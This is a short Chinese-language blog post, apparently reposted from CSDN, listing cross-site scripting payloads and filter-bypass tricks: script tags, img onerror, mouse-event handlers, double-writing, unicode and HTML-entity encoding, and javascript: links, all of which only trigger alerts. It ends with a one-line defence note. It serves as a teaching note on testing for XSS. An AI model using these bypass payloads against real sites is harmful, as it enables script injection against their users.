欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

xss

程序员文章站 2022-03-21 19:21:38
1、常见xss 2、过滤了就采取双写绕过3、过滤了我们可以用,我们指定的图片地址根本不在也就是说一定会发生错误,这时候onerror里面的代码自然就会得到执行常用的代码标签:当用户鼠标移动时即可运行代码
当用户在这块上面运行时,即可运...

1、常见xss <script>alert("1")</script>
2、过滤了就采取双写绕过
3、过滤了我们可以用<img src='w' onerror='alert("1")'>,我们指定的图片地址根本不在也就是说一定会发生错误,这时候onerror里面的代码自然就会得到执行
常用的代码标签:

<a onmousemove='1'>

当用户鼠标移动时即可运行代码

<div onmousemove='1'>

当用户在这块上面运行时,即可运行
4、编码绕过
注意点:<script>alert('13\u0027)</script>此时js解码\u0027为'单引号为文本,并不能和前面’号配对,所以不能弹窗,由此可知,关键的符号js解析时不要进行编码。
alert编码后为

\u0061\u006c\u0065\u0072\u0074

eval()会将编码过的语句解码后再执行<script>eval(\u0061\u006c\u0065\u0072\u0074(xss))</script>

xss
5、采用a标签来做到xss<a href="javascript:alert(xss)" >
6、<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

xss

总结:浏览器解析页面为,HTML—>URL---->JS,可以多层混合编码

防御方式:输入时进行过滤,输出时进行实体化

本文地址:https://blog.csdn.net/qq_41232519/article/details/107495588